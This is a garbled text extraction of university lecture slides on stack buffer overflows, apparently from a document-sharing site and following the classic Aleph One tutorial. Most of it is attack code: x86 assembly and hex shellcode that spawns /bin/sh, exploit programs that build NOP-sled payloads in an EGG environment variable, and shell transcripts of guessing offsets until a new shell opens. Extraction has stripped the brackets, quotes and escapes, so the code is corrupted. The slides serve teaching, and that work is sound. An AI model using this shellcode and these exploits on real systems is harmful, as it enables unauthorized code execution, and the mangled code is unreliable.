资源描述
Click to edit Master title style,Click to edit Master text styles,Second level,Third level,Fourth level,Fifth level,*,Buffer Overflow,Prabhaker Mateti,Wright State University,example3.c,void function(int a,int b,int c),char buffer15;,char buffer210;,int*ret;,ret=buffer1+12;,(*ret)+=8;,void main(),int x;,x=0;,function(1,2,3);,x=1;,printf(%dn,x);,Stack Layout Within function(),bottom of top of,memory memory,buffer2 buffer1 sfp ret a b c,-,top of bottom of,stack stack,Example3.c main()in assembler,0 x8000490:pushl%ebp,0 x8000491:movl%esp,%ebp,0 x8000493:subl$0 x4,%esp,0 x8000496:movl$0 x0,0 xfffffffc(%ebp),0 x800049d:pushl$0 x3,0 x800049f:pushl$0 x2,0 x80004a1:pushl$0 x1,0 x80004a3:call 0 x8000470,0 x80004a8:addl$0 xc,%esp,0 x80004ab:movl$0 x1,0 xfffffffc(%ebp),0 x80004b2:movl 0 xfffffffc(%ebp),%eax,0 x80004b5:pushl%eax,0 x80004b6:pushl$0 x80004f8,0 x80004bb:call 0 x8000378,0 x80004c0:addl$0 x8,%esp,0 x80004c3:movl%ebp,%esp,0 x80004c5:popl%ebp,0 x80004c6:ret,0 x80004c7:nop,execve();exit(0);,Null terminated string/bin/,sh,somewhere.,Address of the string/bin/,sh,somewhere followed by a null pointer.,EAX register=0 xB,EBX register=address of address of/bin/,sh,ECX register=address of/bin/,sh,EDX register=address of the null pointer.,Execute the,int,$0 x80 instruction.,Copy 0 x1 into the EAX register.,Copy 0 x0 into the EBX register.,Execute the,int,$0 x80 instruction.,execve(argv0,argv,NULL);exit(0);,movl string_addr,string_addr_addr,movb$0 x0,null_byte_addr,movl$0 x0,null_addr,movl$0 xb,%eax,movl string_addr,%ebx,leal string_addr,%ecx,leal null_string,%edx,int$0 x80,movl$0 x1,%eax,movl$0 x0,%ebx,int$0 x80,/bin/sh string goes here.,Stack after,ret,is overwritten,bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of,memory 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory,buffer sfp ret a b c,-JJSSSSSSSSSSSSSSCCssssss0 xD80 x010 x020 x03,|,|_|_|(1),(2)|_|,|_|(3),top of bottom of,stack stack,Shell Code Outline,jmp offset-to-call#2 bytes,popl%esi#1 byte,movl%esi,array-offset(%esi)#3 bytes,movb$0 x0,nullbyteoffset(%esi)#4 bytes,movl$0 x0,null-offset(%esi)#7 bytes,movl$0 xb,%eax#5 bytes,movl%esi,%ebx#2 bytes,leal array-offset,(%esi),%ecx#3 bytes,leal null-offset(%esi),%edx#3 bytes,int$0 x80#2 bytes,movl$0 x1,%eax#5 bytes,movl$0 x0,%ebx#5 bytes,int$0 x80#2 bytes,call offset-to-popl#5 bytes,/bin/sh string goes here.,Shell code,jmp 0 x26#2 bytes,popl%esi#1 byte,movl%esi,0 x8(%esi)#3 bytes,movb$0 x0,0 x7(%esi)#4 bytes,movl$0 x0,0 xc(%esi)#7 bytes,movl$0 xb,%eax#5 bytes,movl%esi,%ebx#2 bytes,leal 0 x8(%esi),%ecx#3 bytes,leal 0 xc(%esi),%edx#3 bytes,int$0 x80#2 bytes,movl$0 x1,%eax#5 bytes,movl$0 x0,%ebx#5 bytes,int$0 x80#2 bytes,call -0 x2b#5 bytes,.string/bin/sh#8 bytes,testsc.c,char shellcode=,xebx2ax5ex89x76x08xc6x46x07x00 xc7x46x0cx00 x00 x00,x00 xb8x0bx00 x00 x00 x89xf3x8dx4ex08x8dx56x0cxcdx80,xb8x01x00 x00 x00 xbbx00 x00 x00 x00 xcdx80 xe8xd1xffxff,xffx2fx62x69x6ex2fx73x68x00 x89xecx5dxc3;,void main(),int*ret;,ret=(int*),(*ret)=(int)shellcode;,-,aleph1$gcc-o testsc testsc.c,aleph1$./testsc,$exit,aleph1$,Eliminate 00 bytes,Problem instruction:Substitute with:,-,movb$0 x0,0 x7(%esi)xorl%eax,%eax,movl$0 x0,0 xc(%esi)movb%eax,0 x7(%esi),movl%eax,0 xc(%esi),-,movl$0 xb,%eax movb$0 xb,%al,-,movl$0 x1,%eax xorl%ebx,%ebx,movl$0 x0,%ebx movl%ebx,%eax,inc%eax,-,exploit1.c,char shellcode=,xebx1fx5ex89x76x08x31xc0 x88x46x07x89x46x0cxb0 x0b,x89xf3x8dx4ex08x8dx56x0cxcdx80 x31xdbx89xd8x40 xcd,x80 xe8xdcxffxffxff/bin/sh;,char large_string128;,void main(),char buffer96;,int i;,long*long_ptr=(long*)large_string;,for(i=0;i 32;i+),*(long_ptr+i)=(int)buffer;,for(i=0;i 1),strcpy(buffer,argv1);,exploit2.c,void main(int argc,char*argv),bsize =atoi(argv1);,offset=atoi(argv2);,addr=get_sp()-offset;,buff=malloc(bsize);,addr_ptr=(long*)buff;,for(i=0;i bsize;i+=4),*(addr_ptr+)=addr;,ptr=buf+4;,for(i=0;i strlen(shellcode);i+),*(ptr+)=shellcodei;,buffbsize-1=0;,memcpy(buff,EGG=,4);,putenv(buff);,system(/bin/bash);,Guessing buffer size and offset:,aleph1$./exploit2 600,aleph1$./vulnerable$EGG,Illegal instruction,aleph1$exit,aleph1$./exploit2 600 100,aleph1$./vulnerable$EGG,Segmentation fault,aleph1$exit,aleph1$./exploit2 600 200,aleph1$./vulnerable$EGG,Segmentation fault,aleph1$exit,.,.,.,aleph1$./exploit2 600 1564,aleph1$./vulnerable$EGG,$,.new shell.,exploit3.c,void main(int argc,char*argv),bsize =atoi(argv1);,offset=atoi(argv2);,addr=get_sp()-offset;,buff=malloc(bsize);,addr_ptr=(long*)buff;,for(i=0;i bsize;i+=4),*(addr_ptr+)=addr;,for(i=0;i bsize/2;i+),buffi=NOP;,ptr=buff+bsize/2-strlen(shellcode)/2;,memcpy(ptr,shellcode,strlen(shellcode);,buffbsize-1=0;,memcpy(buff,EGG=,4);,putenv(buff);,system(/bin/bash);,Stack after,ret,is overwritten,bottom of DDDDDDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of,memory 456789ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory,buffer sfp ret a b c,-NNNNJJSSSSSSSSSSSSSSCCssssss0 xD50 x010 x020 x03,|,|_|_|_|_|(1),(2)|_|_|,|_|(3),top of bottom of,stack stack,
展开阅读全文